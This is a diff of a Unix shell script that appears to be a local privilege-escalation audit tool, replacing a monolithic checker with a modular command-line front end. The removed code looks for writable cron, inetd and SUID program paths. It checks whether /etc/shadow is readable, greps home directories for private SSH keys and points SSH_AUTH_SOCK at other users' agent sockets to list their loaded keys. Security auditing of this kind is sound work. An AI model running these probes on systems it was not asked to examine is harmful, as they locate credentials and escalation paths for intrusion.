- CCP_USER=$3 - CCP_PATH=$4 # optional - - # Check the perms of the supplied file regardless - # The caller doesn't want to have to call check_perms as well as check_called_programs - check_perms "$CCP_MESSAGE_STACK" "$CCP_FILE" "$CCP_USER" "$CCP_PATH" - - # Skip the slow check if we're in quick mode - if [ "$MODE" = "standard" ]; then - return 0; - fi - - # Check if file is text or not - IS_TEXT=`file "$CCP_FILE" | grep -i text` - IS_DYNBIN=`file "$CCP_FILE" | grep -i 'dynamically linked'` - - # Process shell scripts (would also work on config files that reference other files) - if [ ! -z "$IS_TEXT" ]; then - # Parse full paths from file - ignoring commented lines - CALLED_FILES=`grep -v '^#' "$CCP_FILE" | sed -e 's/^[^\/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ \*].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u` - for CALLED_FILE in $CALLED_FILES; do - # echo "$CCP_FILE contains a reference to $CALLED_FILE. Checking perms." - check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - else - # Process dynamically linked binaries - if [ ! -z "$IS_DYNBIN" ]; then - - CALLED_FILES=`ldd "$CCP_FILE" 2>/dev/null | grep '/' | sed 's/[^\/]*\//\//' | cut -f 1 -d ' '` - for CALLED_FILE in $CALLED_FILES; do - check_perms "$CCP_MESSAGE_STACK $CCP_FILE uses the library $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - - # Strings binary to look for hard-coded config files - # or other programs that might be called. - for CALLED_FILE in `strings "$CCP_FILE" | sed -e 's/^[^\/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ \*].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`; do - check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - fi - fi -} - -# Parse any full paths from $1 (config files, progs, dirs). -# Check the permissions on each of these. -check_called_programs_suid () { - CCP_FILE=$1 - CCP_PATH=$2 # optional - - get_owner $CCP_FILE; CCP_USER=$GET_OWNER_RETURN - CCP_MESSAGE_STACK="$CCP_FILE is SUID $CCP_USER." - LS=`ls -l $CCP_FILE` - echo "Checking SUID-$CCP_USER program $CCP_FILE: $LS" - - # Don't check perms of executable itself - # check_perms "$CCP_MESSAGE_STACK" "$CCP_FILE" "$CCP_USER" "$CCP_PATH" - - # Check if file is text or not - IS_TEXT=`file "$CCP_FILE" | grep -i text` - IS_DYNBIN=`file "$CCP_FILE" | grep -i 'dynamically linked'` - - # Process shell scripts (would also work on config files that reference other files) - if [ ! -z "$IS_TEXT" ]; then - # Skip the slow check if we're in quick mode - if [ "$MODE" = "standard" ]; then - return 0; - fi - - # Parse full paths from file - ignoring commented lines - CALLED_FILES=`grep -v '^#' "$CCP_FILE" | sed -e 's/^[^\/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ \*].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u` - for CALLED_FILE in $CALLED_FILES; do - # echo "$CCP_FILE contains a reference to $CALLED_FILE. Checking perms." - check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - else - # Process dynamically linked binaries - if [ ! -z "$IS_DYNBIN" ]; then - - CALLED_FILES=`ldd "$CCP_FILE" 2>/dev/null | grep '/' | sed 's/[^\/]*\//\//' | cut -f 1 -d ' '` - for CALLED_FILE in $CALLED_FILES; do - check_perms "$CCP_MESSAGE_STACK $CCP_FILE uses the library $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - - # Skip the slow check if we're in quick mode - if [ "$MODE" = "standard" ]; then - return 0; - fi - - # Strings binary to look for hard-coded config files - # or other programs that might be called. - for CALLED_FILE in `strings "$CCP_FILE" | sed -e 's/^[^\/]*//' -e 's/["'\'':}$]/\x0a/g' | grep '/' | sed -e 's/[ \*].*//' | grep '^/[a-zA-Z0-9_/-]*$' | sort -u`; do - check_perms "$CCP_MESSAGE_STACK $CCP_FILE contains the string $CALLED_FILE." "$CALLED_FILE" "$CCP_USER" "$CCP_PATH" - done - fi - fi -} - -# Check if $1 can be changed by users who are not $2 -check_perms () { - CP_MESSAGE_STACK=$1 - CHECK_PERMS_FILE=$2 - CHECK_PERMS_USER=$3 - CHECK_PERMS_PATH=$4 # optional - - if [ ! -f "$CHECK_PERMS_FILE" ] && [ ! -d "$CHECK_PERMS_FILE" ] && [ ! -b "$CHECK_PERMS_FILE" ]; then - CHECK_PERMS_FOUND=0 - if [ ! -z "$CHECK_PERMS_PATH" ]; then - # Look for it in the supplied path - for DIR in `echo "$CHECK_PERMS_PATH" | sed 's/:/ /g'`; do - if [ -f "$DIR/$CHECK_PERMS_FILE" ]; then - CHECK_PERMS_FOUND=1 - CHECK_PERMS_FILE="$DIR/$CHECK_PERMS_FILE" - break - fi - done - fi - - #if [ "$CHECK_PERMS_FOUND" = "0" ]; then - # echo "ERROR: File $CHECK_PERMS_FILE doesn't exist. Checking parent path anyway." - # # return 0 - # fi - fi - - C=`echo "$CHECK_PERMS_FILE" | cut -c 1` - if [ ! "$C" = "/" ]; then - echo "ERROR: Can't find absolute path for $CHECK_PERMS_FILE. Skipping." - return 0 - fi - - echo " Checking if anyone except $CHECK_PERMS_USER can change $CHECK_PERMS_FILE" - - while [ -n "$CHECK_PERMS_FILE" ]; do - perms_secure "$CP_MESSAGE_STACK" $CHECK_PERMS_FILE $CHECK_PERMS_USER - CHECK_PERMS_FILE=`echo $CHECK_PERMS_FILE | sed 's/\/[^\/]*$//'` - done -} - -# Check if $1 can be read by users who are not $2 -check_read_perms () { - CP_MESSAGE_STACK=$1 - CHECK_PERMS_FILE=$2 - CHECK_PERMS_USER=$3 - - if [ ! -f "$CHECK_PERMS_FILE" ] && [ ! -b "$CHECK_PERMS_FILE" ]; then - echo "ERROR: File $CHECK_PERMS_FILE doesn't exist" - return 0 - fi - - echo " Checking if anyone except $CHECK_PERMS_USER can read file $CHECK_PERMS_FILE" - - perms_secure_read "$CP_MESSAGE_STACK" "$CHECK_PERMS_FILE" "$CHECK_PERMS_USER" -} - -perms_secure_read () { - PS_MESSAGE_STACK=$1 - PERMS_SECURE_FILE=$2 - PERMS_SECURE_USER=$3 - - if [ ! -b "$PERMS_SECURE_FILE" ] && [ ! -f "$PERMS_SECURE_FILE" ] && [ ! -d "$PERMS_SECURE_FILE" ]; then - echo "ERROR: No such file or directory: $PERMS_SECURE_FILE. Skipping." - return 0 - fi - - # Check if owner is different (but ignore root ownership, that's OK) - only_user_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER - - # Check group read perm (but ignore root group, that's OK) - group_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER - - # Check world read perm - world_can_read "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE -} - -perms_secure () { - PS_MESSAGE_STACK=$1 - PERMS_SECURE_FILE=$2 - PERMS_SECURE_USER=$3 - - if [ ! -d "$PERMS_SECURE_FILE" ] && [ ! -f "$PERMS_SECURE_FILE" ] && [ ! -b "$PERMS_SECURE_FILE" ]; then - # echo "ERROR: No such file or directory: $PERMS_SECURE_FILE. Skipping." - return 0 - fi - - # Check if owner is different (but ignore root ownership, that's OK) - only_user_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER - - # Check group write perm (but ignore root group, that's OK) - group_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE $PERMS_SECURE_USER - - # Check world write perm - world_can_write "$PS_MESSAGE_STACK" $PERMS_SECURE_FILE -} - -only_user_can_write () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - O_USER=$3 - - # We just need to check the owner really as the owner - # can always grant themselves write access - get_owner $O_FILE; O_FILE_USER=$GET_OWNER_RETURN - if [ ! "$O_USER" = "$O_FILE_USER" ] && [ ! "$O_FILE_USER" = "root" ]; then - echo "WARNING: $O_MESSAGE_STACK The user $O_FILE_USER can write to $O_FILE" - fi -} - -group_can_write () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - O_USER=$3 # ignore group write access $3 is only member of group - - get_group $O_FILE; O_FILE_GROUP=$GET_GROUP_RETURN - P=`ls -lLd $O_FILE | cut -c 6` - if [ "$P" = "w" ] && [ ! "$O_GROUP" = "root" ]; then - # check the group actually has some members other than $O_USER - group_has_other_members "$O_FILE_GROUP" "$O_USER"; # sets OTHER_MEMBERS to 1 or 0 - if [ "$OTHER_MEMBERS" = "1" ]; then - echo "WARNING: $O_MESSAGE_STACK The group $O_FILE_GROUP can write to $O_FILE" - fi - fi -} - -group_has_other_members () { - G_GROUP=$1 - G_USER=$2 - - # If LDAP/NIS is being used this script can't check group memberships - # we therefore assume the worst. - if [ "$EXT_AUTH" = 1 ]; then - OTHER_MEMBERS=1 - return 1 - fi - - GROUP_LINE=`grep "^$G_GROUP:" /etc/group` - MEMBERS=`echo "$GROUP_LINE" | cut -f 4 -d : | sed 's/,/ /g'` - - GID=`echo "$GROUP_LINE" | cut -f 3 -d :` - EXTRA_MEMBERS=`grep "^[^:]*:[^:]*:[0-9]*:$GID:" /etc/passwd | cut -f 1 -d : | xargs echo` - - for M in $MEMBERS; do - if [ ! "$M" = "$G_USER" ] && [ ! "$M" = "root" ]; then - OTHER_MEMBERS=1 - return 1 - fi - done - - for M in $EXTRA_MEMBERS; do - if [ ! "$M" = "$G_USER" ] && [ ! "$M" = "root" ]; then - OTHER_MEMBERS=1 - return 1 - fi - done - - OTHER_MEMBERS=0 - return 0 -} - -world_can_write () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - - P=`ls -lLd $O_FILE | cut -c 9` - S=`ls -lLd $O_FILE | cut -c 10` - - if [ "$P" = "w" ]; then - if [ "$S" = "t" ]; then - echo "WARNING: $O_MESSAGE_STACK World write is set for $O_FILE (but sticky bit set)" - else - echo "WARNING: $O_MESSAGE_STACK World write is set for $O_FILE" - fi - fi -} - -only_user_can_read () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - O_USER=$3 - - # We just need to check the owner really as the owner - # can always grant themselves read access - get_owner $O_FILE; O_FILE_USER=$GET_OWNER_RETURN - if [ ! "$O_USER" = "$O_FILE_USER" ] && [ ! "$O_FILE_USER" = "root" ]; then - echo "WARNING: $O_MESSAGE_STACK The user $O_FILE_USER can read $O_FILE" - fi -} - -group_can_read () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - O_USER=$3 - - get_group $O_FILE; O_FILE_GROUP=$GET_GROUP_RETURN - P=`ls -lLd $O_FILE | cut -c 5` - if [ "$P" = "r" ] && [ ! "$O_GROUP" = "root" ]; then - # check the group actually has some members other than $O_USER - group_has_other_members "$O_FILE_GROUP" "$O_USER"; # sets OTHER_MEMBERS to 1 or 0 - if [ "$OTHER_MEMBERS" = "1" ]; then - echo "WARNING: $O_MESSAGE_STACK The group $O_FILE_GROUP can read $O_FILE" - fi - fi -} - -world_can_read () { - O_MESSAGE_STACK=$1 - O_FILE=$2 - - P=`ls -lLd $O_FILE | cut -c 8` - - if [ "$P" = "w" ]; then - echo "WARNING: $O_MESSAGE_STACK World read is set for $O_FILE" - fi -} - -section () { - echo - echo '############################################' - echo $1 - echo '############################################' -} - -# Guess OS -if [ -x /usr/bin/showrev ]; then - OS="solaris" - SHADOW="/etc/shadow" -elif [ -x /usr/sbin/sam -o -x /usr/bin/sam ]; then - OS="hpux" - SHADOW="/etc/shadow" -elif [ -f /etc/master.passwd ]; then - OS="bsd" - SHADOW="/etc/master.passwd" -else - OS="linux" - SHADOW="/etc/shadow" -fi -echo "Assuming the OS is: $OS" -CONFIG_FILES="$CONFIG_FILES $SHADOW" - -# Set path so we can access usual directories. HPUX and some linuxes don't have sbin in the path. -PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin; export PATH - -# Check dependent programs are installed -# Assume "which" is installed! -PROGS="ls awk grep cat mount xargs file ldd strings" -for PROG in $PROGS; do - which $PROG 2>&1 > /dev/null - if [ ! $? = "0" ]; then - echo "ERROR: Dependend program '$PROG' is mising. Can't run. Sorry!" - exit 1 - fi -done - -banner - -section "Recording hostname" -hostname - -section "Recording uname" -uname -a - -section "Recording Interface IP addresses" -if [ $OS = 'hpux' ]; then - for IFACE in `lanscan | grep x | awk '{print $5}' 2>/dev/null`; do - ifconfig $IFACE 2>/dev/null - done -else - ifconfig -a -fi - -section "Checking if external authentication is allowed in /etc/passwd" -FLAG=`grep '^+:' /etc/passwd` -if [ -n "$FLAG" ]; then - echo "WARNING: /etc/passwd allows external authentcation:" - grep '^+:' /etc/passwd - EXT_AUTH=1 -else - echo "No +:... line found in /etc/passwd" -fi - -section "Checking nsswitch.conf for addition authentication methods" -if [ -r "/etc/nsswitch.conf" ]; then - NIS=`grep '^passwd' /etc/nsswitch.conf | grep 'nis'` - if [ -n "$NIS" ]; then - echo "WARNING: NIS is used for authentication on this system" - EXT_AUTH=1 - fi - LDAP=`grep '^passwd' /etc/nsswitch.conf | grep 'ldap'` - if [ -n "$LDAP" ]; then - echo "WARNING: LDAP is used for authentication on this system" - EXT_AUTH=1 - fi - - if [ -z "$NIS" ] && [ -z "$LDAP" ]; then - echo "Neither LDAP nor NIS are used for authentication" - fi -else - echo "ERROR: File /etc/nsswitch.conf isn't readable. Skipping checks." -fi - -# Check important config files aren't writable -section "Checking for writable config files" -for FILE in $CONFIG_FILES; do - if [ -f "$FILE" ]; then - check_perms "$FILE is a critical config file." "$FILE" root - fi -done - -section "Checking if $SHADOW is readable" -check_read_perms "/etc/shadow holds authentication data" $SHADOW root - -section "Checking for password hashes in /etc/passwd" -FLAG=`grep -v '^[^:]*:[x\*]*:' /etc/passwd | grep -v '^#'` -if [ -n "$FLAG" ]; then - echo "WARNING: There seem to be some password hashes in /etc/passwd" - grep -v '^[^:]*:[x\*]*:' /etc/passwd | grep -v '^#' - EXT_AUTH=1 -else - echo "No password hashes found in /etc/passwd" -fi - -section "Checking account settings" -# Check for something nasty like r00t::0:0::/:/bin/sh in /etc/passwd -# We only need read access to /etc/passwd to be able to check this. -if [ -r "/etc/passwd" ]; then - OPEN=`grep "^[^:][^:]*::" /etc/passwd | cut -f 1 -d ":"` - if [ -n "$OPEN" ]; then - echo "WARNING: The following accounts have no password:" - grep "^[^:][^:]*::" /etc/passwd | cut -f 1 -d ":" - fi -fi -if [ -r "$SHADOW" ]; then - echo "Checking for accounts with no passwords" - if [ "$OS" = "linux" ]; then - passwd -S -a | while read LINE - do - USER=`echo "$LINE" | awk '{print $1}'` - STATUS=`echo "$LINE" | awk '{print $2}'` - if [ "$STATUS" = "NP" ]; then - echo "WARNING: User $USER doesn't have a password" - fi - done - elif [ "$OS" = "solaris" ]; then - passwd -s -a | while read LINE - do - USER=`echo "$LINE" | awk '{print $1}'` - STATUS=`echo "$LINE" | awk '{print $2}'` - if [ "$STATUS" = "NP" ]; then - echo "WARNING: User $USER doesn't have a password" - fi - done - fi -else - echo "File $SHADOW isn't readable. Skipping some checks." -fi - -section "Checking library directories from /etc/ld.so.conf" -if [ -f "/etc/ld.so.conf" ] && [ -r "/etc/ld.so.conf" ]; then - for DIR in `grep '^/' /etc/ld.so.conf`; do - check_perms "$DIR is in /etc/ld.so.conf." $DIR root - done - - #FILES=`grep '^include' /etc/ld.so.conf | sed 's/^include *//'` - #if [ ! -z "$FILES" ]; then - # for DIR in `echo $FILES | xargs cat | sort -u`; do - # done - #fi -else - echo "File /etc/ld.so.conf not present. Skipping checks." -fi - -# Check sudoers if we have permission - needs root normally -section "Checking sudo configuration" -if [ -f "/etc/sudoers" ] && [ -r "/etc/sudoers" ]; then - echo ----------------- - echo "Checking if sudo is configured" - SUDO_USERS=`grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep -v '^[ \t]*Default' | grep =` - if [ ! -z "$SUDO_USERS" ]; then - echo "WARNING: Sudo is configured. Manually check nothing unsafe is allowed:" - grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep = | grep -v '^[ \t]*Default' - fi - - echo ----------------- - echo "Checking sudo users need a password" - SUDO_NOPASSWD=`grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep NOPASSWD` - if [ ! -z "$SUDO_NOPASSWD" ]; then - echo "WARNING: Some users can use sudo without a password:" - grep -v '^#' /etc/sudoers | grep -v '^[ \t]*$' | grep NOPASSWD - fi -else - echo "File /etc/sudoers not present. Skipping checks." -fi - -section "Checking permissions on swap file(s)" -for SWAP in `swapon -s | grep -v '^Filename' | cut -f 1 -d ' '`; do - check_perms "$SWAP is used for swap space." $SWAP root - check_read_perms "$SWAP is used for swap space." $SWAP root -done - -section "Checking programs run from inittab" -if [ -f "/etc/inittab" ] && [ -r "/etc/inittab" ]; then - for FILE in `cat /etc/inittab | grep : | grep -v '^#' | cut -f 4 -d : | grep '/' | cut -f 1 -d ' ' | sort -u`; do - check_called_programs "$FILE is run from /etc/inittab as root." $FILE root - done -else - echo "File /etc/inittab not present. Skipping checks." -fi - -section "Checking postgres trust relationships" -for DIR in $PGDIRS; do - if [ -d "$DIR" ] && [ -r "$DIR/pg_hba.conf" ]; then - grep -v '^#' "$DIR/pg_hba.conf" | grep -v '^[ \t]*$' | while read LINE - do - AUTH=`echo "$LINE" | awk '{print $NF}'` - if [ "$AUTH" = "trust" ]; then - PGTRUST=1 - echo "WARNING: Postgres trust configured in $DIR/pg_hba.conf: $LINE" - fi - done - fi -done - -PGVER1=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version` - -if [ -n "$PGVER1" ]; then - PGTRUST=1 - echo "WARNING: Can connect to local postgres database as \"postgres\" without a password" -fi - -PGVER2=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version` - -if [ -n "$PGVER2" ]; then - PGTRUST=1 - echo "WARNING: Can connect to local postgres database as \"pgsql\" without a password" -fi - -if [ -z "$PGTRUST" ]; then - echo "No postgres trusts detected" -fi - -# Check device files for mounted file systems are secure -# cat /proc/mounts | while read LINE # Doesn't work so well when LVM is used - need to be root -section "Checking permissions on device files for mounted partitions" -if [ "$OS" = "linux" ]; then - mount | while read LINE + header + preamble + printf "Usage: ${0}\n" + printf "\n" + printf "\t--help\tdisplay this help and exit\n" + printf "\t--version\tdisplay version and exit\n" + printf "\t--color\tenable output coloring\n" + printf "\t--verbose\tverbose level (0-2, default: 1)\n" + printf "\t--type\tselect from one of the following check types:\n" + for checktype in lib/checks/enabled/* do - DEVICE=`echo "$LINE" | awk '{print $1}'` - FS=`echo "$LINE" | awk '{print $5}'` - if [ "$FS" = "ext2" ] || [ "$FS" = "ext3" ] ||[ "$FS" = "reiserfs" ]; then - echo "Checking device $DEVICE" - check_perms "$DEVICE is a mounted file system." $DEVICE root - fi + printf "\t\t`basename ${checktype}`\n" done -elif [ "$OS" = "bsd" ]; then - mount | grep ufs | while read LINE + printf "\t--checks\tprovide a comma separated list of checks to run, select from the following checks:\n" + for check in lib/checks/* do - DEVICE=`echo "$LINE" | awk '{print $1}'` - echo "Checking device $DEVICE" - check_perms "$DEVICE is a mounted file system." $DEVICE root - done -elif [ "$OS" = "solaris" ]; then - mount | grep xattr | while read LINE - do - DEVICE=`echo "$LINE" | awk '{print $3}'` - if [ ! "$DEVICE" = "swap" ]; then - echo "Checking device $DEVICE" - check_perms "$DEVICE is a mounted file system." $DEVICE root - fi - done -elif [ "$OS" = "hpux" ]; then - mount | while read LINE - do - DEVICE=`echo "$LINE" | awk '{print $3}'` - C=`echo $DEVICE | cut -c 1` - if [ "$C" = "/" ]; then - echo "Checking device $DEVICE" - check_perms "$DEVICE is a mounted file system." $DEVICE root + if [ "`basename \"${check}\"`" != "enabled" ] + then + printf "\t\t`basename ${check}`\n" fi done + exit 1 +} - NFS=`mount | grep NFS` - if [ -n "$NFS" ]; then - echo "WARNING: This system is an NFS client. Check for nosuid and nodev options." - mount | grep NFS - fi -fi - -# Check cron jobs if they're readable -# TODO check that cron is actually running -section "Checking cron job programs aren't writable (/etc/crontab)" -CRONDIRS="" -if [ -f "/etc/crontab" ] && [ -r "/etc/crontab" ]; then - MYPATH=`grep '^PATH=' /etc/crontab | cut -f 2 -d = ` - echo Crontab path is $MYPATH - - # Check if /etc/cron.(hourly|daily|weekly|monthly) are being used - CRONDIRS=`grep -v '^#' /etc/crontab | grep -v '^[ \t]*$' | grep '[ \t][^ \t][^ \t]*[ \t][ \t]*' | grep run-crons` - - # Process run-parts - grep -v '^#' /etc/crontab | grep -v '^[ \t]*$' | grep '[ \t][^ \t][^ \t]*[ \t][ \t]*' | grep run-parts | while read LINE - do - echo "Processing crontab run-parts entry: $LINE" - USER=`echo "$LINE" | awk '{print $6}'` - DIR=`echo "$LINE" | sed 's/.*run-parts[^()&|;\/]*\(\/[^ ]*\).*/\1/'` - check_perms "$DIR holds cron jobs which are run as $USER." "$DIR" "$USER" - if [ -d "$DIR" ]; then - echo " Checking directory: $DIR" - for FILE in $DIR/*; do - FILENAME=`echo "$FILE" | sed 's/.*\///'` - if [ "$FILENAME" = "*" ]; then - echo " No files in this directory." - continue - fi - check_called_programs "$FILE is run by cron as $USER." "$FILE" "$USER" - done - fi - done - - # TODO bsd'd periodic: - # 1 3 * * * root periodic daily - # 15 4 * * 6 root periodic weekly - # 30 5 1 * * root periodic monthly - - grep -v '^#' /etc/crontab | grep -v '^[ ]*$' | grep '[ ][^ ][^ ]*[ ][ ]*' | while read LINE - do - echo "Processing crontab entry: $LINE" - USER=`echo "$LINE" | awk '{print $6}'` - PROG=`echo "$LINE" | awk '{print $7}'` - check_called_programs "$PROG is run from crontab as $USER." $PROG $USER $MYPATH - done -else - echo "File /etc/crontab not present. Skipping checks." -fi - -# Do this if run-crons is run from /etc/crontab -if [ -n "$CRONDIRS" ]; then - USER=`echo "$CRONDIRS" | awk '{print $6}'` - section "Checking /etc/cron.(hourly|daily|weekly|monthly)" - for DIR in hourly daily weekly monthly; do - if [ -d "/etc/cron.$DIR" ]; then - echo " Checking directory: /etc/cron.$DIR" - for FILE in /etc/cron.$DIR/*; do - FILENAME=`echo "$FILE" | sed 's/.*\///'` - if [ "$FILENAME" = "*" ]; then - echo "No files in this directory." - continue - fi - check_called_programs "$FILE is run via cron as $USER." "$FILE" $USER - done - fi - done -fi - -section "Checking cron job programs aren't writable (/var/spool/cron/crontabs)" -if [ -d "/var/spool/cron/crontabs" ]; then - for FILE in /var/spool/cron/crontabs/*; do - USER=`echo "$FILE" | sed 's/^.*\///'` - if [ "$USER" = "*" ]; then - echo "No user crontabs found in /var/spool/cron/crontabs. Skipping checks." - continue - fi - echo "Processing crontab for $USER: $FILE" - if [ -r "$FILE" ]; then - MYPATH=`grep '^PATH=' "$FILE" | cut -f 2 -d = ` - if [ -n "$MYPATH" ]; then - echo Crontab path is $MYPATH - fi - grep -v '^#' "$FILE" | grep -v '^[ \t]*$' | grep '[ \t][^ \t][^ \t]*[ \t][ \t]*' | while read LINE - do - echo "Processing crontab entry: $LINE" - PROG=`echo "$LINE" | awk '{print $6}'` - check_called_programs "$PROG is run via cron as $USER." "$PROG" $USER - done - else - echo "ERROR: Can't read file $FILE" - fi - done -else - echo "Directory /var/spool/cron/crontabs is not present. Skipping checks." -fi - -section "Checking cron job programs aren't writable (/var/spool/cron/tabs)" -if [ -d "/var/spool/cron/tabs" ]; then - for FILE in /var/spool/cron/tabs/*; do - USER=`echo "$FILE" | sed 's/^.*\///'` - if [ "$USER" = "*" ]; then - echo "No user crontabs found in /var/spool/cron/crontabs. Skipping checks." - continue - fi - echo "Processing crontab for $USER: $FILE" - if [ -r "$FILE" ]; then - MYPATH=`grep '^PATH=' "$FILE" | cut -f 2 -d = ` - if [ -n "$MYPATH" ]; then - echo Crontab path is $MYPATH - fi - grep -v '^#' "$FILE" | grep -v '^[ \t]*$' | grep '[ \t][^ \t][^ \t]*[ \t][ \t]*' | while read LINE - do - echo "Processing crontab entry: $LINE" - PROG=`echo "$LINE" | awk '{print $6}'` - check_called_programs "$PROG is run from cron as $USER." $PROG $USER $MYPATH - done - else - echo "ERROR: Can't read file $FILE" - fi - done -else - echo "Directory /var/spool/cron/tabs is not present. Skipping checks." -fi - -# Check programs run from /etc/inetd.conf have secure permissions -# TODO: check inetd is actually running -section "Checking inetd programs aren't writable" -if [ -f /etc/inetd.conf ] && [ -r /etc/inetd.conf ]; then - grep -v '^#' /etc/inetd.conf | grep -v '^[ \t]*$' | while read LINE - do - USER=`echo $LINE | awk '{print $5}'` - PROG=`echo $LINE | awk '{print $6}'` # could be tcpwappers ... - PROG2=`echo $LINE | awk '{print $7}'` # ... and this is the real prog - if [ -z "$PROG" ] || [ "$PROG" = "internal" ]; then - # Not calling an external program - continue - fi - echo Processing inetd line: $LINE - if [ -f "$PROG" ]; then - check_called_programs "$PROG is run from inetd as $USER." $PROG $USER - fi - if [ -f "$PROG2" ]; then - check_called_programs "$PROG is run from inetd as $USER." $PROG2 $USER - fi - done -else - echo "File /etc/inetd.conf not present. Skipping checks." -fi - -# Check programs run from /etc/xinetd.d/* -# TODO: check xinetd is actually running -section "Checking xinetd programs aren't writeable" -if [ -d /etc/xinetd.d ]; then - for FILE in `grep 'disable[ \t]*=[ \t]*no' /etc/xinetd.d/* | cut -f 1 -d :`; do - echo Processing xinetd service file: $FILE - PROG=`grep '^[ \t]*server[ \t]*=[ \t]*' $FILE | sed 's/.*server.*=[ \t]*//'` - USER=`grep '^[ \t]*user[ \t]*=[ \t]*' $FILE | sed 's/.*user.*=[ \t]*//'` - check_called_programs "$PROG is run from xinetd as $USER." $PROG $USER - done -else - echo "Directory /etc/xinetd.d not present. Skipping checks." -fi - -# Check for writable home directories -section "Checking home directories aren't writable" -cat /etc/passwd | grep -v '^#' | while read LINE +# TODO make it use lib/misc/validate +CHECKS="" +TYPE="all" +COLORING="0" +VERBOSE="1" +while [ -n "${1}" ] do - echo Processing /etc/passwd line: $LINE - USER=`echo $LINE | cut -f 1 -d :` - DIR=`echo $LINE | cut -f 6 -d :` - SHELL=`echo $LINE | cut -f 7 -d :` - if [ "$SHELL" = "/sbin/nologin" ] || [ "$SHELL" = "/bin/false" ]; then - echo " Skipping user $USER. They don't have a shell." - else - if [ "$DIR" = "/dev/null" ]; then - echo " Skipping /dev/null home directory" + case "${1}" in + --help|-h) + usage + ;; + --version|-v|-V) + version + ;; + --color) + COLORING="1" + ;; + --verbose) + shift + VERBOSE="${1}" + ;; + --type|-t) + shift + TYPE="${1}" + ;; + --checks|-c) + shift + CHECKS="${1}" + ;; + esac + shift +done +header +if [ "${VERBOSE}" != "0" -a "${VERBOSE}" != "1" -a "${VERBOSE}" != "2" ] +then + stdio_message_error "upc" "the provided verbose level ${VERBOSE} is invalid - use 0, 1 or 2 next time" + VERBOSE="1" +fi +if [ -n "${CHECKS}" ] +then + for checkfilename in `printf "${CHECKS}" | tr -d " " | tr "," " "` + do + if [ ! -e "lib/checks/${checkfilename}" ] + then + stdio_message_error "upc" "the provided check name '${checkfilename}' does not exist" else - check_perms "$DIR is the home directory of $USER." $DIR $USER - fi - fi -done - -# Check for readable files in home directories -section "Checking for readable sensitive files in home directories" -cat /etc/passwd | while read LINE -do - USER=`echo $LINE | cut -f 1 -d :` - DIR=`echo $LINE | cut -f 6 -d :` - SHELL=`echo $LINE | cut -f 7 -d :` - for FILE in $HOME_DIR_FILES; do - if [ -f "$DIR/$FILE" ]; then - check_read_perms "$DIR/$FILE is in the home directory of $USER." "$DIR/$FILE" $USER - fi - done -done - -section "Checking SUID programs" -if [ "$MODE" = "detailed" ]; then - for FILE in `find / -type f -perm -04000 2>/dev/null`; do - check_called_programs_suid $FILE - done -else - echo "Skipping checks of SUID programs (it's slow!). Run again in 'detailed' mode." -fi - -# Check for private SSH keys in home directories -section "Checking for Private SSH Keys home directories" -for HOMEDIR in `cut -f 6 -d : /etc/passwd`; do - if [ -d "$HOMEDIR/.ssh" ]; then - PRIV_KEYS=`grep -l 'BEGIN [RD]SA PRIVATE KEY' $HOMEDIR/.ssh/* 2>/dev/null` - if [ -n "$PRIV_KEYS" ]; then - for KEY in $PRIV_KEYS; do - ENC_KEY=`grep -l 'ENCRYPTED' "$KEY" 2>/dev/null` - if [ -n "$ENC_KEY" ]; then - echo "WARNING: Encrypted Private SSH Key Found in $KEY" - else - echo "WARNING: Unencrypted Private SSH Key Found in $KEY" - fi - done - fi - fi -done - -# Check for public SSH keys in home directories -section "Checking for Public SSH Keys home directories" -for HOMEDIR in `cut -f 6 -d : /etc/passwd`; do - if [ -r "$HOMEDIR/.ssh/authorized_keys" ]; then - KEYS=`grep '^ssh-' $HOMEDIR/.ssh/authorized_keys 2>/dev/null` - if [ -n "$KEYS" ]; then - echo "WARNING: Public SSH Key Found in $HOMEDIR/.ssh/authorized_keys" - fi - fi -done - -# Check for any SSH agents running on the box -section "Checking for SSH agents" -AGENTS=`ps -ef | grep ssh-agent | grep -v grep` -if [ -n "$AGENTS" ]; then - echo "WARNING: There are SSH agents running on this system:" - ps -ef | grep ssh-agent | grep -v grep - # for PID in `ps aux | grep ssh-agent | grep -v grep | awk '{print $2}'`; do - for SOCK in `ls /tmp/ssh-*/agent.* 2>/dev/null`; do - SSH_AUTH_SOCK=$SOCK; export SSH_AUTH_SOCK - AGENT_KEYS=`ssh-add -l | grep -v 'agent has no identities.' 2>/dev/null` - if [ -n "$AGENT_KEYS" ]; then - echo "WARNING: SSH Agent has keys loaded [SSH_AUTH_SOCK=$SSH_AUTH_SOCK]" - ssh-add -l + . "lib/checks/${checkfilename}" + `basename "${checkfilename}"`_init + `basename 